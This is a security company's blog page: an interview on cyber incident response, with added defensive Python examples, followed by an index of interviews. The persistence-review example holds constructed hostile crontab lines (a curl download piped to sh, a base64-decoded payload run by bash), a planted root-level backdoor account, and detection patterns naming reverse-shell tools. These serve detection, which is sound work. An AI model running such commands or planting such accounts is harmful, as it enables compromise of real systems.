IT Governance UK Blog: Our Expertise, Your Peace of Mind
https://www.itgovernance.co.uk/blog

A Practical Guide to Cyber Incident Response
https://www.itgovernance.co.uk/blog/a-practical-guide-to-cyber-incident-response
Fri, 24 May 2024 14:02:35 +0000

The post A Practical Guide to Cyber Incident Response appeared first on IT Governance UK Blog.

Expert insight from our cyber incident responder

Cyber attacks and data breaches are a matter of when, not if.

No single measure is 100% foolproof. A determined attacker will always be able to find their way around your defences, given enough time and resources.

Furthermore, as Vanessa Horton, our cyber incident responder, pointed out in an interview about anti-forensics:

The cyber world is changing all the time, which means we’re playing a bit of a cat-and-mouse game. Basically, as one side improves, so does the other.

In this interview, I pick her brain on cyber incident response more generally, gaining her expert insight into the ‘what’, ‘how’ and ‘why’, along with practical, real-life examples.


About Vanessa Horton

Vanessa holds a degree in computer forensics, as well as a number of cyber security and forensics qualifications.

She’s worked for the police as a digital forensics officer, where she was involved in complex crime cases. Vanessa was also awarded a Diamond Award and an Excellence in Service Delivery Award.

Now, she’s part of our cyber incident response team, helping clients with their cyber security requirements.



Cyber incident response misconceptions

What common misconceptions do you see around cyber incident response? Or in your line of work generally?

The big one is the [misplaced] belief that ‘it’s not going to happen to us’. Many organisations believe they won’t suffer a cyber incident, even if other organisations might.

That’s a poor mindset to have because, for one, it’s wrong – everyone will suffer an incident at some point.

But more importantly, this mindset leaves organisations unprepared for when they do suffer that breach, and haven’t got an incident responder on hand to keep the damage to a minimum.

The fact that some big names have ‘been done’ recently shows how nobody’s safe. Not even big cyber threat actors! For example, not so long ago, LockBit [an infamous ransomware gang] got taken down. And various other ransomware groups, including Ragnar Locker and Black Basta, suffered the same fate.

It just goes to show that no one’s above being successfully attacked. That’s just the unfortunate reality.

But if threat actors are being brought down, doesn’t that improve the cyber landscape?

Oh, law enforcement doing its job is definitely a good thing.

However, when you bring one website or gang down, what always happens is that the remaining gang members form a new group.

Law enforcement never catches every single member of the gang when it takes one down. So, the ones who remain are going to take their skills and form new groups.

They might then change their objectives and go after new targets – because they’ll want to establish themselves as that new group.

What do you mean by ‘changing their objectives’?

So, for example, LockBit originally said it wasn’t going to go after hospitals for ethical reasons – perhaps ironic for a criminal gang, but there you go.

Anyway, LockBit changed, and is now going after hospitals.

This adds to my earlier point: you simply don’t know who’s going to be targeted next. And just because one group said it won’t target your industry, doesn’t mean other groups will offer the same courtesy. Plus, you have no way of knowing what any group’s next move will be.

This, by the way, is the type of conversation I often have with clients. It’s how I convince them that they really need that cyber incident response plan, to do tabletop exercises, to train their staff, and so on.

By being open and honest about these things, I can more easily show clients that taking these actions is in their own best interests.

Every organisation should prepare for an incident. They must actively take steps to protect themselves. Because if they don’t, well… We’re all human, and when faced with an unexpected situation like a security incident, you’re going to panic, no matter what.

But by being prepared, you can recover quicker, which makes the company financially better off, as you’ll suffer less disruption. You can also quickly stop the attacker from accessing any further data in your systems, so things don’t get any worse.

Plus, by handling an incident well, stakeholders and the public at large are generally more forgiving, which will obviously serve your reputation well.



Interviewer note: If you did everything you could, people are forgiving about breaches

Louise Brooks, head of consultancy at our sister company DQM GRC, made a similar observation in a recent interview about practical GDPR [General Data Protection Regulation] compliance:

“Organisations must remember that real, living people are behind the vast quantities of information they’re gathering and processing. Those people will be affected if anything goes wrong due to mismanagement of their data.

“However, people are generally open to forgiving organisations when things go wrong if the organisation can demonstrate they treated personal data with the respect that it deserves, and they did the best they can.”


Protection – first steps, simple measures

What are the first steps for organisations to protect themselves?

Before you do anything else, you need to know what you’re defending:

  • What are your key assets among your:
    • Data?
    • Systems?
    • Processes?
  • Where are those assets?
  • What are the risks to them?
  • What controls do you already have in place?

Risk assessment and management are critical starting points, as you need to know what you’re working with before you do anything else. But, as my colleague Andrew Pattison likes to say, it’s important to keep these simple.

The key is to identify your biggest risks, then implement appropriate controls to mitigate them.

What are some simple measures every organisation needs?

Very basic controls can get you a long way:

  • Strong passwords and MFA [multifactor authentication]
  • Anti-malware software
  • Secure configuration
  • Regular patching
  • Firewalls

Not doing these types of things just makes you a more likely target. I don’t like using the word ‘easy’, but that’s what you’re making yourself if you don’t patch or you use passwords like ‘Password123’: an easy target. You’re leaving the door wide open to threat actors.

This also underlines the importance of prevention and detection. Cyber incident response planning doesn’t start with the response – any response is only triggered if you detect abnormalities.



Detection – security monitoring and what is ‘normal’?

How do you detect an anomaly or a suspicious event?

You need to understand your baseline: what’s normal? Because if you can’t answer that, how will you know what is suspicious?

Is it normal if someone logs in from a Russian IP address, for example? And at 1:00 am?

But you don’t need to have someone sit there and monitor all event logs all the time – a security monitoring solution can do that for you, like:

  • An IPS [intrusion prevention system];
  • An IDS [intrusion detection system]; and/or
  • An EDR solution [endpoint detection and response].

You also want systems that log system activity and forward it to a centralised SIEM [security information and event management] solution or SOC [security operations centre].

These types of technological solutions are essential to process huge amounts of information [security events like access logs]. But the human aspect is a vital part of detection, too.

For one, a person will have to ‘teach’ your technological solution what constitutes abnormal behaviour. And two, when your tool detects something suspicious, it must alert a human to follow up on it.


Interviewer note: Automating log analysis with AI

Earlier this year, I spoke to information security manager Adam Seamons about network security. Automated security monitoring tools cropped up, as did the role of AI and machine learning in security:

“AI and machine learning have both been used in detecting anomalies and suspicious patterns for some time, and will only continue to be used more. I expect SOCs to become increasingly reliant on AI.

“Getting more specific, log analysis is a key area for AI to automate. An AI tool could do the heavy lifting, sifting through tons of logs and data to detect and then respond to threats far faster than a human could.”


You gave a 1:00 am login as an example. Does a situation like that require an immediate follow-up?

Good question. Many organisations incorrectly believe that they don’t need 24-hour cover – or at least, don’t need to make someone responsible for responding to an out-of-hours alert from an automated tool.

But things are going to happen overnight. Look at it from the threat actor’s point of view. A smart attacker is going to attempt to breach your systems when they’re at their most vulnerable – i.e. when nobody’s looking.

Organisations are prone to forgetting about out-of-hours protection, but that’s precisely when you most need protection. That’s when you’re more likely to get attacked. Threat actors know that’s when defences tend to be down, and monitoring is slack.

What exactly should organisations be monitoring?

Security events. These are just everyday events on your systems or networks – logins, incoming emails, files received, and so on.

So, for example, if you suddenly get someone logging in from Russia, and they weren’t on a business trip there or something, you need to investigate. This means you’re not just tracking the logins themselves, but also certain information about them – locations and IP addresses, login times, files or services accessed, and so on.

Again, you have to know your baseline. What is expected activity? And if it’s unexpected, someone must quickly investigate. If a threat actor did gain access to a user’s account, you want to prevent them from accessing anything else.

Equally, if it’s just someone who’s on holiday in Russia and decided to log in, you can dismiss the security event. But you must establish that in your initial follow-up; you can’t just assume it’s not a security incident.

[The difference between a security event and a security incident is that an event is an everyday occurrence – like users logging in. But some events also signify a security incident: a breach of confidentiality, integrity and/or availability, also known as the ‘CIA triad’.]
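To make the ‘know your baseline’ idea concrete, here is an added example in Python. It is not part of the interview and not a tool Vanessa or IT Governance uses: it learns each user’s usual login countries and hours from a constructed history of successful logins, then triages new events against that baseline. The IP-to-country table stands in for a real GeoIP database, and every event, address and user name is invented.

```python
"""Baseline-driven login triage: learn what 'normal' looks like per user,
then flag logins that fall outside it for a human to follow up.

Added example; the GeoIP table and every event below are constructed."""
from datetime import datetime

# Constructed IP -> country table standing in for a real GeoIP database.
GEOIP = {
    "203.0.113.10": "GB",
    "203.0.113.11": "GB",
    "198.51.100.7": "GB",
    "192.0.2.44": "RU",
}

# Constructed history of successful logins: (user, ISO timestamp, source IP).
HISTORY = [
    ("alice", "2024-05-01T08:55:00", "203.0.113.10"),
    ("alice", "2024-05-02T09:05:00", "203.0.113.11"),
    ("alice", "2024-05-03T17:40:00", "203.0.113.10"),
    ("bob",   "2024-05-01T07:30:00", "198.51.100.7"),
    ("bob",   "2024-05-02T18:10:00", "198.51.100.7"),
]


def build_baseline(events):
    """Per user: the countries seen and the earliest/latest login hour."""
    baseline = {}
    for user, ts, ip in events:
        hour = datetime.fromisoformat(ts).hour
        entry = baseline.setdefault(user, {"countries": set(), "hours": (hour, hour)})
        entry["countries"].add(GEOIP.get(ip, "??"))
        lo, hi = entry["hours"]
        entry["hours"] = (min(lo, hour), max(hi, hour))
    return baseline


def triage(event, baseline):
    """Reasons an event deviates from the user's baseline (empty list = looks normal)."""
    user, ts, ip = event
    entry = baseline.get(user)
    if entry is None:
        # Never seen before: could be a new starter, could be an account the attacker created.
        return ["no baseline for user"]
    reasons = []
    country = GEOIP.get(ip, "??")
    if country not in entry["countries"]:
        reasons.append(f"login from {country} ({ip}); usual: {sorted(entry['countries'])}")
    hour = datetime.fromisoformat(ts).hour
    lo, hi = entry["hours"]
    if not lo <= hour <= hi:
        reasons.append(f"login at {hour:02d}:00; usual window {lo:02d}:00-{hi:02d}:00")
    return reasons


def alerts(events, baseline):
    """Only the events that need a human to look at them, with the reasons."""
    return [(e, triage(e, baseline)) for e in events if triage(e, baseline)]


if __name__ == "__main__":
    base = build_baseline(HISTORY)
    # Constructed new events: the 01:00 Russian login from the interview, plus two others.
    new = [
        ("alice", "2024-05-20T01:00:00", "192.0.2.44"),
        ("bob",   "2024-05-20T12:00:00", "198.51.100.7"),
        ("carol", "2024-05-20T10:00:00", "203.0.113.10"),
    ]
    for event, why in alerts(new, base):
        print(event, "->", "; ".join(why))
```

The output is a list of events for a person to follow up, not a verdict: the same 01:00 login from Russia is an incident if the account holder is at their desk in Leeds and a dismissable event if they are on holiday, and only the follow-up establishes which. In practice the baseline is built from weeks of SIEM data rather than five lines, and the tool is ‘taught’ exceptions (travelling staff, shift workers) as they are confirmed.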

To what extent does seasonality play a role in security monitoring? Like weekdays vs weekends, for example, or Black Friday?

Oh, seasonality plays a role, for sure. Black Friday is the perfect example.

If you’re a retailer, you’re going to see way more web traffic than usual. You must be able to handle that. By having more people on call, for example. By double-checking things. You need to plan ahead and assess the risks.

Again, a smart threat actor will target your weakest link, and when you’re at your most vulnerable. So, if they wanted to take your website down, for example, with a DoS attack [denial of service], a day like Black Friday is a prime time to target, when traffic is up anyway, and it’ll take fewer additional requests to flood your servers.

Black Friday is also a great time [from the attacker’s perspective] to cause most harm. If your website isn’t operating that day, you’ll take a massive financial hit in terms of lost sales.



Threat types and risk assessment

DoS attacks aside, what other cyber threats or attack types must organisations consider?

Take your pick:

  • DoS
  • Phishing
  • Ransomware
  • DNS poisoning
  • Backdoor attacks

Ultimately, a lot of them involve malware, but threat actors can deliver it in many different ways. The more important thing to think about is where and when you’re most vulnerable. Black Friday is one example. The end of your financial year is another, when you’re dealing with tons of confidential information.

You’re not just looking at who might target you and how, but also when you’d suffer the biggest blow. When would the impact of a security incident be at its worst? [I.e. business impact analysis.]

And OK, not every attacker will think that way. But this question is one every organisation should consider, because you want to be operational during your most critical times. Even if the cause of a disruption wasn’t malicious, you don’t want it to happen – and especially not at a time when disruption would be costly.

How can organisations balance the cost of such assessments and measures against the risk of an incident or a disruption?

That’s always the challenge, especially for smaller organisations. Everyone needs to find that balance and make those difficult choices.

To help make them, ask questions like:

I think of this as a gap assessment, which can be against a standard like ISO 27001 or NIST SP 800-53. I’ve found that many organisations particularly like the NIST incident response guidance because it’s so accessible.



Interviewer note: The core principles behind cyber resilience and defence in depth

Vanessa covered the core ideas behind the three broad layers of cyber defence in depth:

  1. Prevention
  2. Detection
  3. Response

The core idea behind prevention is risk assessment. Identify your threats and weaknesses, and where and when your business would most suffer from a cyber incident, then implement measures to mitigate the risks as best you can. Concentrate on the more basic, cost-effective measures – like firewalls and patching – that prevent most common attacks.

The core idea behind detection is that preventive measures can fail. As Vanessa said to me: “They can only do so much.” You can think of the cyber security world as a ‘cat-and-mouse game’ in which the ‘cat’ (attacker) has the upper hand. Besides, there’ll always be zero-day exploits.

So, you want to become aware – as quickly as possible – of when your prevention failed. The key here is to know what ‘normal’ looks like, so you can identify abnormal behaviour, potentially indicating a cyber security incident.

Let’s get deeper into response: the follow-up to when your tools flag up an anomaly.


Cyber incident response plan

What’s the first step in planning your response?

Your cyber incident response plan. No doubt about it.

Incident response planning is such a vital part of having an effective response overall. As I said earlier, we’re human – panic is natural in unexpected situations. Even if you are prepared!

But preparing and documenting a solid response plan – an incident action plan, if you like – ensures that even when under pressure, people do the right things. They make all the right decisions, because they were made ahead of time, outside the heat of the moment.

A good security incident plan should also ensure that your approach is consistent, even if a key person is unavailable.

How can organisations further improve their cyber incident response plan?

Your incident response plan should include a different incident response playbook for different threats. Dealing with malware on your systems requires a different response than, for example, a DoS attack.

Also, test your plan. Tabletop exercises are important – they tell you whether your plans are working as intended. Plus, they make for valuable training for staff! It’s always much easier to do something if it feels familiar.

[Note: Vanessa gave an example of this below.]



Training – specialist skills and when to outsource

What training do staff with incident response roles or responsibilities need?

That depends on the individual’s role in the team.

Cyber incident response isn’t an IT issue, but a business issue requiring input from a wide range of stakeholders.

At a minimum, training should include:

  • What constitutes an incident;
  • Responsibilities during an incident response;
  • Activities for ensuring compliance with legal requirements;
  • How, when and to whom an incident should be escalated; and
  • How to handle, store and process evidence in a forensically sound manner.

Is that a common issue? Not recognising something as a potential incident?

We do often see that. Different people in an organisation have different opinions on the definition of an incident.

In many situations, differing views are great. But in the context of incident response in cyber security, the organisation needs to ensure a consistent definition and approach, so staff training can cover it clearly.

You need to teach people how to recognise the abnormal stuff. And to put in a security incident report to someone adequately trained. Whoever triages must know both what to look for and how to handle it securely, to ensure the organisation is taking the right actions from the start.

When is it better to have or develop that technical expertise internally, and when is it better to outsource?

It depends on:

  • Your organisational size;
  • The complexity of your systems; and
  • Your internal capabilities.

If you’re a smaller organisation, it’s unlikely you have the internal capability. More complex organisations would probably also benefit from outsourcing all or some of the capabilities – digital forensics, for example.

Using external expertise also means relying on people for whom responding to an incident is an everyday occurrence. They’ll know exactly what actions to take, and won’t allow their skills to become rusty. In fact, they make a point of keeping up with industry news and trends.

That’s completely different from an internal capacity, whose day-to-day likely involves other tasks. That makes them less comfortable dealing with an exceptional situation like a security breach.

What skills are specific for incident response? That an internal person is unlikely to use day to day?

Again, keeping up with, and having a deep understanding of, the latest threats. That gives them the ability to quickly detect and respond to these threats.

More specialist capabilities include:

  • Digital forensics [discussed below];
  • Malware analysis; and
  • Threat hunting.

These often require expensive training and significant effort to keep up, as the latest approaches keep evolving.

In fact, due to cost, these are often – unfortunately – not conducted in cyber incident response.

This is a mistake. If you don’t understand what happened, how it happened and when it happened, it makes the incident response procedure much more challenging. It’s not enough to just get your business up and running again.

Do you have a real-world example?

We had a client that had been compromised with ransomware. They decided not to pay – which I think is best in most cases – and restored all their services without investigating the root cause.

They got done a second time just two weeks later, by the same threat actor, wiping everything out again. After which they contacted us.

Anyway, it makes the point: you must understand and remediate the initial vulnerabilities before declaring the incident response complete:

  • Investigate how the attackers got into the environment.
  • Check for back doors and persistence mechanisms, such as scheduled tasks, new users, new processes, and so on.

Ensure you’ve closed your vulnerabilities, or you’ll get done again. Possibly by the same attacker.

Ending up back where you started is hugely disruptive. Not only that – the financial and reputational impacts are massive, too. Journalists love writing about the ones attacked twice in a short period. Akumin at the end of last year is a good example.
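As an added example, not part of the interview and not IT Governance’s own tooling, the Python below shows two of the persistence checks Vanessa lists: it diffs the restored host’s account list against a known-good snapshot (new accounts, UID 0 accounts, changed login shells) and screens the system crontab for download-and-execute shapes. The passwd and crontab contents are constructed; the check for new processes she also mentions is not covered here.

```python
"""Post-ransomware persistence review: diff accounts against a known-good
snapshot and screen scheduled tasks for download-and-execute patterns.

Added example; all file contents below are constructed."""
import re

# Constructed /etc/passwd snapshot taken from a known-good backup.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""

# Constructed /etc/passwd as found on the host being reviewed.
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
support:x:0:1001:support:/home/support:/bin/bash
"""

# Constructed system crontab (m h dom mon dow user command).
CRONTAB = """\
17 *    * * *   root      cd / && run-parts --report /etc/cron.hourly
0 3     * * *   root      /usr/local/bin/backup.sh
*/5 *   * * *   www-data  curl -s http://198.51.100.23/u.sh | sh
@reboot         root      echo dGVzdA== | base64 -d | bash
"""

# Command shapes that rarely belong in a legitimate scheduled task.
SUSPICIOUS_CRON = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s"), "reverse shell primitive"),
    (re.compile(r"(^|\s)(/tmp|/dev/shm)/"), "runs from a world-writable path"),
]


def parse_passwd(text):
    """Map account name -> the fields the review cares about."""
    accounts = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        accounts[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return accounts


def review_accounts(baseline_text, current_text):
    """Findings as (account, reason) for anything that drifted from the snapshot."""
    base, cur = parse_passwd(baseline_text), parse_passwd(current_text)
    findings = []
    for name, acct in cur.items():
        if name not in base:
            findings.append((name, "account not in baseline"))
            if acct["uid"] == 0:
                findings.append((name, "new account with UID 0"))
            continue
        if acct["uid"] == 0 and base[name]["uid"] != 0:
            findings.append((name, "UID changed to 0"))
        if acct["shell"] != base[name]["shell"]:
            # A service account given an interactive shell is a classic quiet backdoor.
            findings.append((name, f"shell changed {base[name]['shell']} -> {acct['shell']}"))
    for name in base.keys() - cur.keys():
        findings.append((name, "account missing"))
    return findings


def review_crontab(text):
    """Findings as (line, reason) for scheduled tasks matching a suspicious shape."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_CRON:
            if pattern.search(line):
                findings.append((line.strip(), reason))
    return findings


if __name__ == "__main__":
    for item, reason in review_accounts(BASELINE_PASSWD, CURRENT_PASSWD) + review_crontab(CRONTAB):
        print(f"{reason}: {item}")
```

On a real host you would feed `review_accounts` the `/etc/passwd` from a pre-incident backup and from the live system, and `review_crontab` the contents of `/etc/crontab`, `/etc/cron.d/*` and each user’s crontab. A clean result is not proof of a clean host; it is one of several checks to complete before the incident is declared closed.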

Can you share any other real-world examples?

We had a client that kept getting phishing emails, with staff repeatedly falling for them, clicking the links and typing in their credentials. This suggested a fault with their staff training, and that their email filters weren’t robust enough.

In a scenario like that, you want to stop the threat actor gaining further access to anything, but also prevent this from happening over and over again.

It means figuring out the root cause. Getting an answer to why this keeps happening. Which means asking:

  1. Why are so many phishing emails coming through? Why aren’t they stopped?
  2. Why do staff keep falling for them?

Without addressing these, you’re going to keep suffering the same incident. That’s clearly bad for business – financially, operationally and reputationally.

So, a part of incident response resources should go towards resolving this incident, and part towards future prevention. But, of course, had this organisation invested in better training and filters to begin with, they wouldn’t have had to spend all that money after the fact.





Common incident response errors

What’s the first step when responding to a cyber security incident?

Step one is always to confirm whether the incident is real, and if so, to determine the scope and potential impact.

It’s fine if you can’t answer all questions to start with – that’s normal. But as the investigation progresses, you must keep reevaluating your situation and risks.

You may also have to report the incident, often within just 72 hours, under legal obligations like:

  • The GDPR [General Data Protection Regulation];
  • The PCI DSS [Payment Card Industry Data Security Standard];
  • The NIS Regulations [Network and Information Systems Regulations]; and/or
  • DORA [Digital Operational Resilience Act].

What else should organisations do during the first stage of their response?

Isolate the compromised device and/or network segment from the rest of the environment to prevent further damage.

Also, if the device is already on, do not power it off.

I remember an exchange during a tabletop exercise that focused on digital forensics:

  • Someone said: “I’ll just power off the machine.”
  • I exclaimed: “No, no, no! Stop!”
  • Everyone just stared at me. Someone asked, completely puzzled: “Why?”
  • I explained that I couldn’t reveal the rest of the scenario to them at that stage, but did say that if they turned off that machine, they’d lose vital evidence.

They were about to lose critical evidence only stored in the RAM [the device’s memory]. Once you power off your machine, you permanently wipe that memory.

You see, some malware only runs in the memory, with very few artifacts stored on the hard drive. That limits what we can discover during any forensic investigation. Sometimes, the memory also stores ransomware decryption keys.

[However, if your device is already powered off, don’t switch it on. That makes changes to the system that could overwrite logs or other evidence.]

A lot of people think they’re doing the right thing by turning off their infected machine, when they should only disconnect it from the network. This comes back to training.

You’ve got to train people, particularly on those stages that happen before an external specialist would come on the scene. A key part of that is to not lose evidence. That’s something staff must be trained to do.

Turning off your machine is very instinctive. It’s the classic IT solution: rebooting your PC solves a lot of problems. But doing the right thing in this scenario isn’t difficult – you just have to know what the ‘right’ thing is.

What are some other common errors that are easy to correct with basic awareness?

A common one is people simply deleting phishing emails. They just assume that IT already knows about it, or that someone else will report it.

But no: we all have a part to play in security, and clicking that ‘Report Message’ button in Outlook takes seconds – everyone’s got time to do that. And it may just save your organisation a lot of money.

Another thing is to keep your list of contacts and plans up to date. And to keep copies independent of your connected systems.

This might sound too obvious, but I’ve seen it so many times: people suffer an incident, they can’t get to their files, and then realise that they don’t know who to call, and haven’t got a way of easily finding out.

In short, keep a printed copy of your computer incident response plan, or save the contacts on your phone or something – and keep these copies up to date – so you can get in touch with the right people quickly, should you suffer an ICT disruption.



Digital forensics

Let’s come back to digital forensics. What does that involve?

A digital forensics investigation aims to answer questions like:

  • How and when did the threat actors gain access?
  • What did the threat actors do once they got into the IT environment?

Any digital forensic investigation should be conducted by someone who is trained to do so, because of the evidence aspect again. Any evidence an investigator uncovers might be used in future prosecutions.

The output of this investigation may also lead to follow-up actions such as malware analysis or threat hunting. That’s proactively looking for undetected threats in the network.



Incident response process

Walk me through the next incident response steps. What happens after you isolate the device and conduct a forensic investigation?

I should point out that device isolation isn’t the only thing you might need to do to contain the incident.

Maybe you need to isolate a critical service while the investigation is ongoing. Or you need to engage with third-party providers, such as Cloud service providers, which could give you access to vital logs or isolate the service for you – things like that.

Those initial stages, like the forensic analysis, will inform how you contain the situation and what the next steps should be.

What’s the next step in the incident response process, after containment?

Eradication and recovery. That can involve replacing or rebuilding compromised systems, which takes time and may impact legacy applications.

That process may include, but definitely isn’t limited to:

  • Restoring and securing base systems;
  • Restoring data from backups [following verification of integrity]; and
  • Scanning for known vulnerabilities.

Also, we test any recovered systems for functionality and security before reintroducing them into the IT environment.

Once reintroduced, we monitor them for a period – ideally, at least a week – to make sure the threat actors haven’t returned.

The indicators of compromise discovered during the investigation help inform us what suspicious activity we’re monitoring for. For example:

  • Specific network connections from suspicious IP addresses or domains;
  • Running applications and related services; and
  • Compromised user accounts.
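The post-recovery monitoring Vanessa describes amounts to matching the investigation’s indicators of compromise against fresh logs. Here is an added example in Python, not from the interview or IT Governance’s tooling, that does this across three constructed log formats (firewall connections, DNS queries and authentication events) for all three indicator types she lists: bad IP addresses and ranges, bad domains including their subdomains, and compromised accounts. Every indicator and log line is invented.

```python
"""Post-recovery IoC monitoring: match indicators from the investigation
against new firewall, DNS and authentication logs.

Added example; indicators and log lines are constructed."""
import ipaddress
import re

# Constructed indicators of compromise from the (hypothetical) investigation.
IOCS = {
    "ips": {"192.0.2.44", "198.51.100.23"},
    "networks": {"203.0.113.0/28"},
    "domains": {"update-cdn.example", "c2.example.net"},
    "accounts": {"support", "svc_backup"},
}
NETWORKS = [ipaddress.ip_network(n) for n in IOCS["networks"]]

# Constructed post-recovery log lines: "<source> <timestamp> key=value ...".
LOGS = """\
fw 2024-05-21T02:13:07 ALLOW src=10.0.0.12 dst=198.51.100.23 dport=443
fw 2024-05-21T02:14:00 ALLOW src=10.0.0.12 dst=93.184.216.34 dport=443
dns 2024-05-21T02:13:05 client=10.0.0.12 query=files.update-cdn.example type=A
dns 2024-05-21T02:15:09 client=10.0.0.20 query=www.example.com type=A
auth 2024-05-21T02:20:31 user=svc_backup result=success src=203.0.113.9
auth 2024-05-21T08:01:00 user=alice result=success src=10.0.0.50
"""

KV = re.compile(r"(\w+)=(\S+)")


def ip_hit(value):
    """Reason string if the address is a known-bad IP or inside a known-bad range."""
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return None
    if value in IOCS["ips"]:
        return f"known-bad IP {value}"
    for net in NETWORKS:
        if addr in net:
            return f"IP {value} in known-bad range {net}"
    return None


def domain_hit(name):
    """Reason string if the name is a known-bad domain or a subdomain of one."""
    name = name.lower().rstrip(".")
    for bad in IOCS["domains"]:
        # Require a dot boundary so 'notupdate-cdn.example' does not match.
        if name == bad or name.endswith("." + bad):
            return f"query for known-bad domain {name}"
    return None


def match_line(line):
    """All (timestamp, source, reason) hits for one log line."""
    parts = line.split(None, 2)
    if len(parts) < 3:
        return []
    source, ts, rest = parts
    fields = dict(KV.findall(rest))
    reasons = []
    for key in ("src", "dst"):
        if key in fields:
            hit = ip_hit(fields[key])
            if hit:
                reasons.append(hit)
    if "query" in fields:
        hit = domain_hit(fields["query"])
        if hit:
            reasons.append(hit)
    if fields.get("user") in IOCS["accounts"]:
        reasons.append(f"activity by compromised account {fields['user']}")
    return [(ts, source, r) for r in reasons]


def monitor(log_text):
    """Run every line through the indicator checks and collect the hits."""
    hits = []
    for line in log_text.splitlines():
        hits.extend(match_line(line))
    return hits


if __name__ == "__main__":
    for ts, source, reason in monitor(LOGS):
        print(f"{ts} [{source}] {reason}")
```

A hit here means the threat actor may be back, or the eradication missed something, so each one goes straight to a human for the same confirm-scope-impact cycle described earlier. Keep the compromised-account indicators in place even after those accounts are disabled: a login attempt against a disabled account is itself a sign the attacker still has the credentials.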

What’s the next step in the incident response life cycle, after recovery?

Once you’re satisfied that you’ve fully remedied the situation, do a post-incident review:

  • What happened?
  • How did it happen?
  • What was the impact?
  • What went well in the response?
  • What could have gone smoother?
  • How can we improve for next time?

In short, establish and implement the lessons learned. This will only improve your ability to protect against, detect and respond to future cyber security incidents.

Should that sort of information also be shared externally?

Yes! Again, we all have a part to play when it comes to cyber security – not just within an organisation, but also in the wider community.

So, it’s important to contribute to threat intelligence. For example, take the ransomware attack on the British Library last year. It released a report to the public afterwards, which talks about what happened, how it happened and what the Library learned from it.

I love this sort of thing, because it shows so clearly that you’re taking cyber security [and cyber security incident response] seriously. You’re holding yourself accountable and being transparent.

Also, by publishing something like this, you’re helping other people. It shows that you’ve done your best.

Most people find it far easier to trust an organisation being open about what happened and what they’ve done about it, than an organisation trying to cover things up.

Don’t be like 23andMe, only admitting to things when forced to and blaming the victims to boot. It just makes you wonder what’s really going on, and question the company’s respect for its customers. PR is a big part of security incident management, too!


Find out how we can help

We take a pragmatic approach to assessing and managing your incident response needs. We align standards and best practices with your operational and business requirements.

Talk to us today to see how we can help you.


We hope you enjoyed this edition of our ‘Expert Insight’ series. We’ll be back soon, chatting to another expert within GRC International Group.

In the meantime, why not check out our previous interview with Vanessa on anti-forensics?

If you’d like to get our latest interviews and resources straight to your inbox, subscribe to our free Security Spotlight newsletter. Alternatively, explore our full index of interviews here.

Free Expert Insights: Index of Interviews
https://www.itgovernance.co.uk/blog/free-expert-insights
Fri, 24 May 2024 10:14:00 +0000

The post Free Expert Insights: Index of Interviews appeared first on IT Governance UK Blog.

At least once a week, we sit down with an expert from within the Group to get their insights on a technical topic or business area.

Here are all our Q&As to date, grouped by broad topic:

  • AI
  • Cyber attacks and data breaches
  • Cyber Essentials
  • Cyber resilience
  • Cyber security
  • Data privacy
  • DORA
  • Europrivacy
  • Incident response
  • ISO 27001
  • PCI DSS
  • PECR
  • Security testing
  • Supply chains
  • Training
  • Miscellaneous

To get new expert insights straight to your inbox, sign up to our weekly newsletter, the Security Spotlight.


Last updated: 24 May 2024. Interviews added: Camden Woollven on privacy and ethical concerns around AI (AI); Kirsten Craig on the APRA (data privacy); Vanessa Horton on cyber incident response (incident response); and Matthew Peers on ISO 27001 and physical security (ISO 27001). 


AI

Camden Woollven on privacy and ethical concerns around AI

22 May 2024

Head of AI Camden talks us through the ethical principles for guiding AI development, how those principles relate to data privacy, high-risk domains (such as healthcare), and why AI ethics requires a team effort in this interview.

Mark James on AI and data protection 

11 April 2024

Privacy consultant Mark talks about the data protection risks of AI, the GDPR’s (General Data Protection Regulation) restrictions around automated decision-making, legal bases for processing personal data via AI systems, and how to address the risks from that type of processing in this interview.

Mark James on voice cloning

23 February 2024

What is voice cloning, what are the associated risks, and what can organisations do to protect themselves? Privacy consultant Mark answers all these questions and more in this interview.


Cyber attacks and data breaches

Leon Teale on the mother of all breaches

24 January 2024

Senior penetration tester Leon talks us through the implications of a historic 26-billion-records leak. Learn why even old credentials can cause a lot of damage, and how you can protect yourself in this interview.


Cyber Essentials

Ashley Brett on Cyber Essentials and ISO 27001

10 May 2024

Cyber security advisor and product evangelist Ashley talks us through some common Cyber Essentials misconceptions, key differences between Cyber Essentials and ISO 27001, the benefits of each, and things to consider if you’re implementing both in this interview.

Ashley Brett on Cyber Essentials solutions

21 February 2024

Cyber security advisor and product evangelist Ashley provides a simple overview of the Cyber Essentials scheme. He also talks us through various Cyber Essentials solutions to help you choose the right one in this interview.


Cyber resilience

Adam Seamons on cyber defence in depth

19 April 2024

What is defence in depth, why is it important and how does it work? Information security manager Adam answers all these questions and more, giving practical, expert insight into defending against malware in multiple layers, with details on the purpose of each, in this interview.

Alan Calder on cyber resilience

24 November 2023

Group CEO Alan gives us a quick overview of his award-winning book: Cyber Resilience – Defence-in-depth principles. He also explains why defence in depth is so important in this interview.


Cyber security

Leon Teale on zero-day exploits

24 April 2024

What are zero-day exploits and who is most at risk? How can we detect zero-day vulnerabilities and attacks, and protect ourselves from them? Plus, how much of an outlier was the MOVEit Transfer breach? We put all these questions and more to senior penetration tester Leon in this interview.

Adam Seamons on zero-trust architecture

5 January 2024

Information security manager Adam gives us a short history lesson about how networks have evolved, and the security consequences of that evolution. In particular, he highlights the risks of Cloud infrastructure and the merits of zero-trust architecture in this interview.

Vanessa Horton on ransomware trends

20 November 2023
